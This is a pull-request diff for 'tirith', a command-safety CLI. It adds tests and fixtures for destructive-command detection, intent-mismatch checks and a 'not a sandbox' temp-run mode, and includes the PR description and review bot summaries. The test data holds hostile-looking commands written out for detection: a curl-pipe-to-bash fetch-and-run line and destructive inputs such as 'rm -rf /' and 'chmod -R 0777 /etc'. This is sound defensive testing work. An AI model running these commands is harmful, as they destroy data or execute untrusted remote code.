@@ -8262,3 +8262,91 @@ fn intend_empty_command_is_usage_error() {
         "an empty command should be a usage error (exit 2)"
     );
 }
+
+// ---------------------------------------------------------------------------
+// M10 ch6 — `tirith temp-run` (file isolation only; NOT a sandbox).
+// ---------------------------------------------------------------------------
+
+/// Positive: a command that creates a file lands that file in the temp dir
+/// (reported as a `new_files` diff entry), NOT in the caller's cwd. Runs
+/// non-interactively (no TTY) so the temp dir is kept and its path is printed
+/// in the JSON envelope; the test deletes it afterward.
+#[cfg(unix)]
+#[test]
+fn temp_run_creates_file_in_temp_dir_not_cwd() {
+    let tmpdir = tempfile::tempdir().expect("tmpdir");
+    let workdir = tmpdir.path().join("project");
+    fs::create_dir_all(&workdir).unwrap();
+
+    let out = tirith()
+        .args(["temp-run", "--json", "--", "touch foo.txt"])
+        .current_dir(&workdir)
+        .output()
+        .expect("failed to run tirith");
+
+    assert_eq!(out.status.code(), Some(0), "touch should exit 0");
+
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("temp-run --json should be valid JSON");
+
+    // The honesty marker is the load-bearing assertion.
+    assert_eq!(
+        json["isolation_kind"], "file_only_not_a_sandbox",
+        "JSON must carry the not-a-sandbox isolation_kind marker"
+    );
+    assert_eq!(json["not_a_sandbox"], true);
+
+    // foo.txt was created INSIDE the temp dir → reported as a new file.
+    let new_files = json["new_files"].as_array().expect("new_files array");
+    assert!(
+        new_files.iter().any(|v| v == "foo.txt"),
+        "foo.txt should be reported as a new file in the temp dir, got: {new_files:?}"
+    );
+
+    // ...and NOT in the caller's working directory.
+    assert!(
+        !workdir.join("foo.txt").exists(),
+        "temp-run must not touch the caller's cwd"
+    );
+
+    // Non-interactive → the temp dir is kept; clean it up.
+    assert_eq!(json["temp_dir_kept"], true);
+    if let Some(p) = json["temp_dir"].as_str() {
+        let kept = PathBuf::from(p);
+        assert!(
+            kept.join("foo.txt").is_file(),
+            "the created file should live in the kept temp dir"
+        );
+        let _ = fs::remove_dir_all(&kept);
+    }
+}
+
+/// Smoke: a trivial safe command (`true`) exits 0 and emits the not-a-sandbox
+/// markers. We never run untrusted code in CI — this only exercises the
+/// envelope and honesty fields.
+#[cfg(unix)]
+#[test]
+fn temp_run_smoke_true_emits_isolation_kind() {
+    let out = tirith()
+        .args(["temp-run", "--json", "--", "true"])
+        .output()
+        .expect("failed to run tirith");
+
+    assert_eq!(out.status.code(), Some(0), "`true` should exit 0");
+
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("temp-run --json should be valid JSON");
+    assert_eq!(json["isolation_kind"], "file_only_not_a_sandbox");
+    assert_eq!(json["not_a_sandbox"], true);
+    assert!(
+        json["disclaimer"]
+            .as_str()
+            .is_some_and(|d| d.contains("not a sandbox")),
+        "JSON disclaimer must say it is not a sandbox"
+    );
+
+    // Clean up the kept temp dir (non-interactive keeps it).
+    if let Some(p) = json["temp_dir"].as_str() {
+        let _ = fs::remove_dir_all(PathBuf::from(p));
+    }
+}

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -8119,3 +8119,146 @@ fn init_prompt_status_supports_bash_and_fish_and_powershell() {
         );
     }
 }
+
+// M10 ch4 — `tirith intend` intent-vs-command heuristic. Two acceptance cases:
+// (1) "install a formatter" does NOT justify piping a remote script to a shell
+//     → mismatch on download-pipe → exit 1.
+// (2) "download and run an installer" explicitly justifies the same command
+//     → no mismatch → exit 0.
+
+#[test]
+fn intend_install_formatter_flags_download_pipe_mismatch() {
+    let out = tirith()
+        .args([
+            "intend",
+            "install a formatter",
+            "--",
+            "curl https://x/install.sh | bash",
+        ])
+        .output()
+        .expect("failed to run tirith");
+    assert_eq!(
+        out.status.code(),
+        Some(1),
+        "install-a-formatter vs curl|bash should flag a mismatch (exit 1)"
+    );
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    assert!(
+        stdout.contains("MISMATCH"),
+        "human output should announce a MISMATCH, got:\n{stdout}"
+    );
+    assert!(
+        stdout.contains("download_pipe"),
+        "mismatch should name the download_pipe signal, got:\n{stdout}"
+    );
+}
+
+#[test]
+fn intend_download_and_run_justifies_download_pipe() {
+    let out = tirith()
+        .args([
+            "intend",
+            "download and run an installer",
+            "--",
+            "curl https://x/install.sh | bash",
+        ])
+        .output()
+        .expect("failed to run tirith");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "download-and-run explicitly justifies curl|bash (exit 0)"
+    );
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    assert!(
+        stdout.contains("OK"),
+        "human output should announce OK, got:\n{stdout}"
+    );
+}
+
+#[test]
+fn intend_explain_shows_per_signal_derivation() {
+    let out = tirith()
+        .args([
+            "intend",
+            "--explain",
+            "install a formatter",
+            "--",
+            "curl https://x/install.sh | bash",
+        ])
+        .output()
+        .expect("failed to run tirith");
+    assert_eq!(out.status.code(), Some(1));
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    assert!(
+        stdout.contains("derivation"),
+        "--explain should print a derivation section, got:\n{stdout}"
+    );
+    // Which intent keyword matched, and the mismatch pairing.
+    assert!(
+        stdout.contains("intent keyword") && stdout.contains("install"),
+        "--explain should show the matched intent keyword, got:\n{stdout}"
+    );
+    assert!(
+        stdout.contains("NOT justified"),
+        "--explain should explain why the pairing is a mismatch, got:\n{stdout}"
+    );
+}
+
+#[test]
+fn intend_json_envelope_is_stable() {
+    let out = tirith()
+        .args([
+            "intend",
+            "--explain",
+            "--json",
+            "install a formatter",
+            "--",
+            "curl https://x/install.sh | bash",
+        ])
+        .output()
+        .expect("failed to run tirith");
+    assert_eq!(out.status.code(), Some(1));
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("intend --json should produce valid JSON");
+    assert_eq!(json["schema_version"], 1);
+    assert_eq!(json["mismatch"], true);
+    assert!(json["intent_signals"].is_array());
+    assert!(json["command_signals"].is_array());
+    assert!(json["mismatches"].is_array());
+    // --explain populates the derivation array under --json.
+    assert!(
+        json["derivation"].is_array(),
+        "--explain --json must include a derivation array: {json}"
+    );
+    assert_eq!(
+        json["analysis_kind"],
+        "intent_vs_command_heuristic_advisory_not_a_block"
+    );
+}
+
+#[test]
+fn intend_clean_command_exits_zero() {
+    let out = tirith()
+        .args(["intend", "list files", "--", "ls -la"])
+        .output()
+        .expect("failed to run tirith");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "a clean command exhibits no high-impact behavior → exit 0"
+    );
+}
+
+#[test]
+fn intend_empty_command_is_usage_error() {
+    let out = tirith()
+        .args(["intend", "install a formatter", "--"])
+        .output()
+        .expect("failed to run tirith");
+    assert_eq!(
+        out.status.code(),
+        Some(2),
+        "an empty command should be a usage error (exit 2)"
+    );
+}

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -179,6 +179,11 @@ help_example_tests! {
     // the top-level shortcut and the namespaced `checkpoint watch` form.
     help_watch                 => (["watch", "--help"], "tirith watch -- npm install left-pad");
     help_checkpoint_watch      => (["checkpoint", "watch", "--help"], "tirith watch -- npm install left-pad");
+    // M10 ch3 — `tirith taint` tainted-content tracking.
+    help_taint                 => (["taint", "--help"], "tirith taint list");
+    help_taint_list            => (["taint", "list", "--help"], "tirith taint list --json");
+    help_taint_explain         => (["taint", "explain", "--help"], "tirith taint explain ./install.sh");
+    help_taint_clear           => (["taint", "clear", "--help"], "tirith taint clear ./install.sh --yes");
 }
 
 #[test]

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -173,6 +173,8 @@ help_example_tests! {
     help_hooks_scan            => (["hooks", "scan", "--help"], "tirith hooks scan --json");
     help_hooks_guard           => (["hooks", "guard", "--help"], "tirith hooks guard on");
     help_hooks_explain         => (["hooks", "explain", "--help"], "tirith hooks explain pre-commit");
+    // M10 ch1 — `tirith preview` blast-radius simulator.
+    help_preview               => (["preview", "--help"], "tirith preview -- \"rm -rf ./dist\"");
 }
 
 #[test]

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -191,6 +191,32 @@ help_example_tests! {
     help_baseline_learn        => (["baseline", "learn", "--help"], "tirith baseline learn --json");
     help_baseline_status       => (["baseline", "status", "--help"], "tirith baseline status --json");
     help_baseline_reset        => (["baseline", "reset", "--help"], "tirith baseline reset --yes");
+    // M10 ch6 — `tirith temp-run` file-isolation workflow (D1, NOT a sandbox).
+    help_temp_run              => (["temp-run", "--help"], "tirith temp-run -- ./script.sh");
+}
+
+/// The dominant requirement for `temp-run` is honesty-of-claim: the help text
+/// must state plainly that it is NOT a sandbox and the command runs with full
+/// privileges. Pin the exact wording so a future edit can't soften it.
+#[test]
+fn help_temp_run_states_not_a_sandbox() {
+    let out = tirith()
+        .args(["temp-run", "--help"])
+        .output()
+        .expect("failed to run tirith");
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    assert!(
+        stdout.to_lowercase().contains("not a sandbox"),
+        "temp-run --help must say it is NOT a sandbox, got:\n{stdout}"
+    );
+    assert!(
+        stdout.contains("full user privileges"),
+        "temp-run --help must say the command runs with full user privileges, got:\n{stdout}"
+    );
+    assert!(
+        stdout.contains("keychain"),
+        "temp-run --help must warn the command can read the keychain, got:\n{stdout}"
+    );
 }
 
 #[test]

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -186,6 +186,11 @@ help_example_tests! {
     help_taint_clear           => (["taint", "clear", "--help"], "tirith taint clear ./install.sh --yes");
     // M10 ch4 — `tirith intend` intent-vs-command heuristic.
     help_intend                => (["intend", "--help"], "tirith intend \"install a formatter\" -- \"curl https://x/install.sh | bash\"");
+    // M10 ch5 — `tirith baseline learn|status|reset` (opt-in anomaly baseline, D2).
+    help_baseline              => (["baseline", "--help"], "tirith baseline learn");
+    help_baseline_learn        => (["baseline", "learn", "--help"], "tirith baseline learn --json");
+    help_baseline_status       => (["baseline", "status", "--help"], "tirith baseline status --json");
+    help_baseline_reset        => (["baseline", "reset", "--help"], "tirith baseline reset --yes");
 }
 
 #[test]

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -175,6 +175,10 @@ help_example_tests! {
     help_hooks_explain         => (["hooks", "explain", "--help"], "tirith hooks explain pre-commit");
     // M10 ch1 — `tirith preview` blast-radius simulator.
     help_preview               => (["preview", "--help"], "tirith preview -- \"rm -rf ./dist\"");
+    // M10 ch2 — `tirith watch` post-run diff. Two spellings, one impl: pin both
+    // the top-level shortcut and the namespaced `checkpoint watch` form.
+    help_watch                 => (["watch", "--help"], "tirith watch -- npm install left-pad");
+    help_checkpoint_watch      => (["checkpoint", "watch", "--help"], "tirith watch -- npm install left-pad");
 }
 
 #[test]

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -184,6 +184,31 @@ help_example_tests! {
     help_taint_list            => (["taint", "list", "--help"], "tirith taint list --json");
     help_taint_explain         => (["taint", "explain", "--help"], "tirith taint explain ./install.sh");
     help_taint_clear           => (["taint", "clear", "--help"], "tirith taint clear ./install.sh --yes");
+    // M10 ch4 — `tirith intend` intent-vs-command heuristic.
+    help_intend                => (["intend", "--help"], "tirith intend \"install a formatter\" -- \"curl https://x/install.sh | bash\"");
+}
+
+#[test]
+fn help_intend_documents_exit_codes() {
+    // `tirith intend` is Info-level and never blocks, but a non-zero exit on
+    // mismatch lets scripts detect one. The help must spell the codes out so
+    // the documented contract matches the integration tests.
+    let out = tirith().args(["intend", "--help"]).output().unwrap();
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    assert!(
+        stdout.contains("Exit codes"),
+        "intend --help must document its exit codes, got:\n{stdout}"
+    );
+    assert!(
+        stdout.contains("1  at least one mismatch"),
+        "intend --help must document exit 1 on mismatch, got:\n{stdout}"
+    );
+    // The honesty caveat: never blocks.
+    let collapsed: String = stdout.split_whitespace().collect::<Vec<_>>().join(" ");
+    assert!(
+        collapsed.contains("NEVER blocks") || collapsed.contains("never blocks"),
+        "intend --help must state it never blocks, got:\n{stdout}"
+    );
 }
 
 #[test]

--- a/docs/threat-model.md
+++ b/docs/threat-model.md
@@ -38,6 +38,30 @@
 - **Privileged attacker defense**: a root/admin user can bypass tirith trivially
 - **Anti-debugging**: tirith does not resist analysis or reverse engineering
 
+### `tirith temp-run` is file isolation, NOT a sandbox
+
+`tirith temp-run` (M10 ch6; the `sandbox-dir` word is a hidden alias) runs a
+command in a fresh `mkdtemp` working directory and diffs the files it touched.
+This does **not** contradict the runtime-sandboxing non-goal above, and the
+command says so loudly on every surface — help text, every human output banner,
+and a machine-readable `"isolation_kind": "file_only_not_a_sandbox"` field in
+its JSON envelope:
+
+> file isolation only; not a sandbox. The command runs with full user
+> privileges and can read your keychain, ssh keys, AWS creds, and the network.
+> Use this for filesystem-impact preview ONLY.
+
+The ONLY thing `temp-run` changes is the working directory, so files the
+command *writes* land in the temp dir instead of polluting your tree. It is a
+file-isolation workflow for previewing filesystem impact — not a containment
+boundary. A malicious command run under `temp-run` can still read every secret
+on the machine, reach the network, and modify anything outside the temp dir
+(e.g. `$HOME`) exactly as it could if run directly. `--strip-env` trims the
+child environment to a small allowlist (HOME, PATH, USER, LANG, TERM) as a
+convenience, but a trimmed environment is likewise not a security control.
+Real kernel sandboxing (`bwrap`, `sandbox-exec`, seccomp) remains a deliberate
+non-goal.
+
 ## Trust Boundaries
 
 1. **Shell hook to tirith binary**: the hook passes the command string; tirith trusts the hook to provide the actual command

--- a/tests/fixtures/command.toml
+++ b/tests/fixtures/command.toml
@@ -2025,3 +2025,96 @@ forbidden_rules = [
     "exec_in_repo_bin",
     "path_writable_dir_before_system",
 ]
+
+# M10 ch1 — blast-radius CHEAP hot-path subset (4 rules:
+# blast_writes_system_path, blast_empty_var_glob, blast_find_delete,
+# blast_rsync_delete).
+#
+# These fire from `engine::analyze` (Exec) via the filesystem-FREE
+# `blast_radius::cheap_check`, gated at tier-1 by the `destructive_fs_op`
+# PATTERN_TABLE entry. They are pure string-shape checks (plus an env-map
+# lookup for the empty-`$VAR/` case) — NO filesystem walk, NO glob expansion,
+# NO file counting. The 3 SIMULATOR-ONLY rules (blast_deletes_outside_repo,
+# blast_symlink_traversal, blast_large_file_count) require the filesystem walk
+# that runs ONLY under `tirith preview`, so they have NO static fixture (they
+# live in EXTERNALLY_TRIGGERED_RULES, covered by blast_radius.rs unit tests).
+#
+# IMPORTANT: the golden-fixture runner uses `cwd = None`, so cheap_check
+# snapshots the real process env. The empty-`$VAR/` fixture uses a variable
+# name that is never set in CI (`TIRITH_FIXTURE_UNSET_DIR`) so it resolves to
+# empty and the rule fires deterministically.
+
+[[fixture]]
+name = "blast_rm_rf_home_system_path"
+min_milestone = 10
+input = "rm -rf /home"
+context = "exec"
+expected_action = "block"
+expected_rules = ["blast_writes_system_path"]
+
+[[fixture]]
+name = "blast_rm_rf_root_slash_system_path"
+min_milestone = 10
+input = "rm -rf /"
+context = "exec"
+expected_action = "block"
+expected_rules = ["blast_writes_system_path"]
+
+[[fixture]]
+name = "blast_chmod_recursive_etc_system_path"
+min_milestone = 10
+input = "chmod -R 0777 /etc"
+context = "exec"
+expected_action = "block"
+expected_rules = ["blast_writes_system_path"]
+
+[[fixture]]
+name = "blast_empty_var_glob_collapses_to_root"
+min_milestone = 10
+input = 'rm -rf "$TIRITH_FIXTURE_UNSET_DIR/"'
+context = "exec"
+expected_action = "block"
+expected_rules = ["blast_empty_var_glob"]
+
+[[fixture]]
+name = "blast_find_delete_recursive_sweep"
+min_milestone = 10
+input = "find . -type f -delete"
+context = "exec"
+expected_action = "warn"
+expected_rules = ["blast_find_delete"]
+
+[[fixture]]
+name = "blast_rsync_delete_prunes_destination"
+min_milestone = 10
+input = "rsync -a --delete src/ dst/"
+context = "exec"
+expected_action = "warn"
+expected_rules = ["blast_rsync_delete"]
+
+[[fixture]]
+name = "blast_rm_rf_relative_dist_no_fire"
+min_milestone = 10
+input = "rm -rf ./dist"
+context = "exec"
+expected_action = "allow"
+expected_rules = []
+# The whole point of the hot/cold split: a repo-relative target is NOT a system
+# path, so the CHEAP hot-path check stays silent. Counting `./dist`'s impact is
+# `tirith preview`'s job (off the hot path), never `tirith check`'s.
+forbidden_rules = [
+    "blast_writes_system_path",
+    "blast_deletes_outside_repo",
+    "blast_large_file_count",
+    "blast_symlink_traversal",
+]
+
+[[fixture]]
+name = "blast_find_without_delete_no_fire"
+min_milestone = 10
+input = "find . -type f -name '*.rs'"
+context = "exec"
+expected_action = "allow"
+expected_rules = []
+# `find` without `-delete` is not destructive — must not fire.
+forbidden_rules = ["blast_find_delete"]

--- a/tests/fixtures/command.toml
+++ b/tests/fixtures/command.toml
@@ -2068,12 +2068,24 @@ context = "exec"
 expected_action = "block"
 expected_rules = ["blast_writes_system_path"]
 
+# F2: tirith sees only its OWN process env, not the interactive shell's. A var
+# that is merely ABSENT from tirith's env (like `TIRITH_FIXTURE_UNSET_DIR`) might
+# be a benign non-exported shell-local, so the rule fires at Info (advisory),
+# NOT High/Block — over-blocking a safe command teaches users to `--bypass`.
+# A var that is PRESENT-and-empty IS an unambiguous collapse and fires High;
+# that case is unit-tested in blast_radius.rs (`empty_var_present_empty_is_high…`)
+# because a fixture cannot inject a present-and-empty var into the live process
+# env without an env mutation (the libc setenv race — see PR #125).
+# DEPENDENCY: this fixture relies on `TIRITH_FIXTURE_UNSET_DIR` being absent in
+# the test process env; if CI ever sets that name the rule would resolve it and
+# this fixture would change shape. The rule still fires (so the tier-1-reachable
+# safeguard covers it), just at Info → Allow.
 [[fixture]]
 name = "blast_empty_var_glob_collapses_to_root"
 min_milestone = 10
 input = 'rm -rf "$TIRITH_FIXTURE_UNSET_DIR/"'
 context = "exec"
-expected_action = "block"
+expected_action = "allow"
 expected_rules = ["blast_empty_var_glob"]
 
 [[fixture]]


### PR DESCRIPTION
## Summary

Stacks on PR #128 (`feat/m9-workstation-hygiene`). Implements **all 6 chunks of M10** (Blast Radius & Diff) per `M6_TO_M14_PLAN.md`. **12 new RuleIds**, including the two design-decision features D1 (`temp-run`) and D2 (`baseline`), both shipped opt-in / non-default per the plan.

## What landed (6 commits)

- `ca9c8c4` **ch1** — `tirith preview -- "<cmd>"` + 7 blast-radius rules + `blast_radius` simulator. **Hot/cold split enforced**: hot path runs only 4 cheap string-shape rules (`BlastWritesSystemPath`, `BlastEmptyVarGlob`, `BlastFindDelete`, `BlastRsyncDelete`); the FS-walking simulator (`BlastDeletesOutsideRepo`, `BlastSymlinkTraversal`, `BlastLargeFileCount`) runs ONLY under explicit `tirith preview`. Walk capped depth 5 / 100k files. `tirith check` never walks the FS.
- `3aec4ed` **ch2** — `tirith watch` + `tirith checkpoint watch` (two surfaces, one impl) + `PostRunShellRcModified` (High). Snapshot → run → snapshot → diff. `--with-net-hints` experimental/off-by-default with an honest "not a network monitor" banner.
- `015fdab` **ch3** — `tirith taint list|explain|clear` + 2 rules (`ExecOfTaintedFile` High, `CommandSourcedFromTaintedFile` Medium) + JSONL store at `state_dir()/taint.jsonl` (per-process 5s cache on the hot path). New `tirith fetch --save <path> <url>` (download-and-keep, marks the saved path tainted; `tirith run` still uses an ephemeral temp file).
- `34e3f62` **ch4** — `tirith intend "<intent>" -- "<cmd>"` pure-Rust intent-vs-command mismatch heuristic. **0 RuleIds, no LLM.** Maps `engine::analyze` findings → command signals; flags high-impact signals the stated intent doesn't justify. Exit 0 (match) / 1 (mismatch, advisory) / 2 (usage).
- `1c18dcf` **ch5 (D2)** — `tirith baseline learn|status|reset` + 2 anomaly rules (`AnomalyFirstTimeInThisRepo`, `AnomalyRareInBaseline`, both Info). **Default OFF** (`policy.baseline_enabled=false` → zero hot-path I/O). Privacy: salted sha256 hostnames, cwd → 8-char repo-root hash, per-install 0600 salt. Window 90d, LRU cap 100k.
- `1a5e5ac` **ch6 (D1)** — `tirith temp-run` file-isolation workflow (`sandbox-dir` hidden alias). **0 RuleIds.** Portable Rust: `tempfile` mkdtemp, `walkdir`+`fs::copy` with `.git/` filter (no `cp --exclude`), `env_clear()` + HOME/PATH/USER/LANG/TERM allowlist (no `env -i`). **Honesty-of-claim**: help text + every output banner + JSON `"isolation_kind": "file_only_not_a_sandbox"` + `docs/threat-model.md` all state plainly it is NOT a sandbox (runs with full user privileges).

## RuleIds added (12 net-new)

- ch1 (7): `BlastDeletesOutsideRepo`, `BlastWritesSystemPath`, `BlastSymlinkTraversal`, `BlastEmptyVarGlob`, `BlastFindDelete`, `BlastRsyncDelete`, `BlastLargeFileCount`
- ch2 (1): `PostRunShellRcModified`
- ch3 (2): `ExecOfTaintedFile`, `CommandSourcedFromTaintedFile`
- ch5 (2): `AnomalyFirstTimeInThisRepo`, `AnomalyRareInBaseline`

## Design decisions (D1/D2) — both shipped non-default

- **D1 (temp-run)**: kept with strict honesty-of-claim — file isolation, NOT a security boundary. Canonical name `temp-run`; `sandbox-dir` is a hidden alias; help/JSON/threat-model all correct the "safe" framing.
- **D2 (baseline)**: opt-in `tirith baseline learn` only; default OFF; privacy via salted hashes (no raw hostnames/paths).

## Test plan

- [x] `cargo fmt --all --check` clean
- [x] `cargo clippy --workspace --all-targets -- -D warnings` clean
- [x] `cargo test -p tirith-core --lib` — 2106 passed
- [x] `cargo test -p tirith-core --test golden_fixtures` — 38 passed (5 safeguards green, incl. `test_tier1_does_not_gate_findings`)
- [x] `cargo test --workspace` — only `bash_hook_unexpected_rc_degrades_in_pty` fails (known-flaky macOS PTY test)
- [x] Hot-path discipline: `engine::analyze` doc-comment lists the cheap blast subset; simulator/baseline/taint all off the `tirith check` hot path (baseline gated by default-off flag; taint cached; blast simulator preview-only).

## Reviewer pointers

- Base PR (#128 — M9) is open. Stacks cleanly.
- Next PR in chain: **M11 — Trust Ecosystem** (`feat/m11-trust-ecosystem`).
- Note: M10 ch5 added `getrandom` as a direct dep (already transitively present) for the per-install salt.
- Plan source: `M6_TO_M14_PLAN.md` (M10 section + D1/D2 design-decision notes).

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added destructive command preview simulation to assess filesystem impact before execution.
  * Introduced opt-in anomaly baseline detection to identify novel or rare behavior in repositories.
  * Added taint tracking for downloaded files and risky sources with list/explain/clear commands.
  * Introduced intent vs. command mismatch analyzer to detect behavior inconsistencies.
  * Added `watch` mode to monitor file and runtime state changes after command execution.
  * Added `temp-run` mode for filesystem-isolated command execution (not a sandbox).
  * Enhanced `fetch` with `--save` option to download and mark files as tainted.
  * Added post-run shell rc modification detection.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/sheeki03/tirith/pull/129?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR implements all 6 chunks of M10 (Blast Radius & Diff), adding 12 new `RuleId`s, two opt-in design-decision features (D1 `temp-run` file isolation and D2 `baseline` anomaly detection), plus `tirith watch`, `tirith taint`, `tirith intend`, and `tirith preview` surfaces — stacking on PR #128.

- **ch1 (blast-radius)**: hot/cold split enforced — 4 cheap string-shape rules on the exec hot path, 3 FS-walking simulator-only rules exclusively under `tirith preview`; walk capped at depth 5 / 100k files.
- **ch3 (taint)**: JSONL taint store with per-process 5 s / mtime cache; `ExecOfTaintedFile` / `CommandSourcedFromTaintedFile` fire on the hot path when the store is non-empty.
- **ch5/ch6 (D1/D2)**: both opt-in/default-OFF; D1 carries honest \"not a sandbox\" banners throughout; D2 stores only salted-SHA256 hashes.

<h3>Confidence Score: 4/5</h3>

The core hot-path additions are well-structured with a clear hot/cold split and thorough test coverage; the opt-in features are correctly gated behind default-off flags.

The `is_system_path` function silently misses `/sys/`, `/proc/`, and `/dev/` with a trailing slash; `load_or_create_salt` uses truncate-on-write instead of create_new, which can corrupt concurrent observations; and `apply_baseline` performs N full JSONL reads per analysis with no per-call cache.

crates/tirith-core/src/baseline.rs (salt race and repeated store reads) and crates/tirith-core/src/blast_radius.rs (trailing-slash gap in is_system_path)

<h3>Important Files Changed</h3>




| Filename | Overview |
|----------|----------|
| crates/tirith-core/src/blast_radius.rs | New blast-radius module with hot/cold split; `is_system_path` omits trailing-slash variants for `/sys/`, `/proc/`, `/dev/`, causing those paths with a trailing slash to bypass the rule |
| crates/tirith-core/src/baseline.rs | New opt-in anomaly-detection baseline (D2); `load_or_create_salt` uses `create(true).truncate(true)` which can corrupt another concurrent process's already-written observations; `lookup_at` has no per-analysis cache causing N full-file reads per command |
| crates/tirith-core/src/engine.rs | Adds taint-hot-check and anomaly-baseline wiring; `apply_baseline` performs N separate `lookup_at` calls (each a full JSONL read) for N distinct findings |
| crates/tirith-core/src/taint.rs | New taint-tracking store with per-process cache (TTL + mtime invalidation); atomic rewrites; path-keyed limitation documented; logic looks correct |
| crates/tirith/src/cli/temp_run.rs | New D1 file-isolation workflow; honesty-of-claim banners in help, human output, and JSON; `copy_repo_into` correctly prunes `.git` |
| crates/tirith-core/src/runner.rs | Adds `download_to_path` with 10 MiB body cap, atomic write, SHA-256 verification, 0600 permissions, and 10-hop redirect cap |

</details>



<h3>Sequence Diagram</h3>

```mermaid
sequenceDiagram
    participant U as User
    participant CLI as tirith CLI
    participant E as engine::analyze
    participant BR as blast_radius
    participant T as taint store
    participant BL as baseline store

    Note over CLI,BL: tirith check hot path
    U->>CLI: tirith check
    CLI->>E: analyze(ctx, policy)
    E->>BR: cheap_check(input, env_map)
    BR-->>E: findings
    opt taint store non-empty
        E->>T: is_tainted_at(path)
        T-->>E: TaintEntry
    end
    opt baseline_enabled
        E->>BL: lookup x N then record x N
    end
    E-->>CLI: Verdict
    CLI-->>U: output

    Note over CLI,BR: tirith preview cold path
    U->>CLI: tirith preview
    CLI->>BR: simulate(cwd, repo_root)
    BR-->>CLI: BlastReport
    CLI-->>U: findings

    Note over CLI,T: tirith fetch save
    U->>CLI: tirith fetch --save path url
    CLI->>CLI: download_to_path
    CLI->>T: mark_tainted
    CLI-->>U: saved
```

<!-- greptile_failed_comments -->
<details><summary><h3>Comments Outside Diff (1)</h3></summary>

1. `crates/tirith-core/src/engine.rs`, line 1 ([link](https://github.com/sheeki03/tirith/blob/1a5e5accf2d1a25159c05f1051c23438e0fe6b3c/crates/tirith-core/src/engine.rs#L1)) 

   <a href="#"><img alt="P2" src="https://greptile-static-assets.s3.amazonaws.com/badges/p2.svg?v=9" align="top"></a> **`apply_baseline`: N full-store reads per analysis**

   Inside `apply_baseline`, every distinct finding tuple calls `crate::baseline::lookup(&key)`, and each `lookup` invocation calls `lookup_at`, which opens and linearly scans the entire JSONL store. With N firing findings per command and up to 100k lines in the store, a single `tirith check` call when baseline is enabled performs N × full-file reads (plus N `record` calls, each doing another read for `line_count`). Loading the store once at the top of `apply_baseline` and reusing the parsed `Vec<Observation>` for all lookups would reduce this to a single read per analysis.

   Note: If this suggestion doesn't match your team's coding style, reply to this and let me know. I'll remember it for next time!

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20crates%2Ftirith-core%2Fsrc%2Fengine.rs%0ALine%3A%201%0A%0AComment%3A%0A**%60apply_baseline%60%3A%20N%20full-store%20reads%20per%20analysis**%0A%0AInside%20%60apply_baseline%60%2C%20every%20distinct%20finding%20tuple%20calls%20%60crate%3A%3Abaseline%3A%3Alookup%28%26key%29%60%2C%20and%20each%20%60lookup%60%20invocation%20calls%20%60lookup_at%60%2C%20which%20opens%20and%20linearly%20scans%20the%20entire%20JSONL%20store.%20With%20N%20firing%20findings%20per%20command%20and%20up%20to%20100k%20lines%20in%20the%20store%2C%20a%20single%20%60tirith%20check%60%20call%20when%20baseline%20is%20enabled%20performs%20N%20%C3%97%20full-file%20reads%20%28plus%20N%20%60record%60%20calls%2C%20each%20doing%20another%20read%20for%20%60line_count%60%29.%20Loading%20the%20store%20once%20at%20the%20top%20of%20%60apply_baseline%60%20and%20reusing%20the%20parsed%20%60Vec%3CObservation%3E%60%20for%20all%20lookups%20would%20reduce%20this%20to%20a%20single%20read%20per%20analysis.%0A%0AHow%20can%20I%20resolve%20this%3F%20If%20you%20propose%20a%20fix%2C%20please%20make%20it%20concise.&repo=sheeki03%2Ftirith&pr=129&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=3"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3" height="20"></picture></a>

</details>

<!-- /greptile_failed_comments -->

